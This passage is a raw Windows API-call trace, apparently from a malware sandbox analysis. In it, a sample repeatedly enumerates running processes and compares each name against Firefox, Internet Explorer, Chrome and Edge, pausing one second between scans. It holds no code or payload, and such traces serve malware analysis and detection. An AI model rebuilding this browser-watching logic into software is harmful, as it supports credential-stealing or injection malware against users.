[0238.917] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0238.917] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0238.917] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.917] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0238.917] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0238.917] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0238.917] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0238.917] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.917] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0238.918] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0238.918] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0238.918] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0238.918] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.918] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0238.919] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0238.919] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0238.919] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0238.919] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.919] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0238.919] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0238.919] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0238.919] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0238.919] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.919] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0238.920] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0238.920] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0238.920] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0238.920] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.920] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0238.920] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0238.920] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0238.920] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0238.920] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.920] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0238.921] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0238.921] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0238.923] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0238.923] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.923] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0238.923] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0238.923] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0238.923] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0238.923] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.923] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0238.924] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0238.924] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0238.924] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0238.924] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.924] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0238.924] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0238.925] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0238.925] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0238.925] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.925] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0238.925] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0238.925] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0238.925] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0238.925] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.925] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0238.926] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0238.926] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0238.926] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0238.926] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.926] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0238.926] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0238.926] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0238.926] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0238.926] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.926] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0238.927] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0238.927] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0238.927] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0238.927] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.927] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0238.927] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0238.927] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0238.927] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0238.927] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.927] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0238.928] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0238.928] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0238.928] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0238.928] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.928] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0238.928] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0238.929] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0238.929] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0238.929] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.929] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.929] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0238.929] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0238.929] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0238.929] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.929] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.930] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.930] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.930] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.930] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.930] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0238.930] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0238.930] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0238.930] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0238.930] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.930] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.931] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.931] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.931] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.931] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.931] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0238.931] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0238.931] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0238.931] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0238.931] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.931] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.932] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0238.932] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0238.932] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0238.932] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.932] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0238.932] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0238.932] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0238.933] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0238.933] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.933] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.933] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0238.933] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0238.933] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0238.933] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.933] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.934] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0238.934] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0238.934] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0238.934] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.934] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.934] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0238.934] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0238.934] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0238.934] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.934] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.935] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0238.935] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0238.935] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0238.935] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.935] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.935] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0238.935] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0238.935] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0238.935] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.935] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0238.936] CloseHandle (hObject=0xd4) returned 1 [0238.936] Sleep (dwMilliseconds=0x3e8) [0239.937] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0239.938] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.939] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0239.939] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0239.939] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0239.939] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0239.939] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0239.939] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0239.939] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0239.939] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0239.939] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0239.939] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0239.940] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0239.940] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0239.940] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0239.940] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.940] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.940] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0239.941] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0239.941] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0239.941] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.941] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0239.941] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0239.941] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0239.941] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0239.941] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.941] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.942] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0239.942] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0239.942] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0239.942] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.942] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0239.942] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0239.942] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0239.942] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0239.942] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.942] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0239.943] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0239.943] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0239.943] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0239.943] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.943] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0239.943] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0239.943] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0239.943] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0239.943] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.943] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0239.944] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0239.944] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0239.944] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0239.944] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.944] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.944] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.945] lstrcmpiA 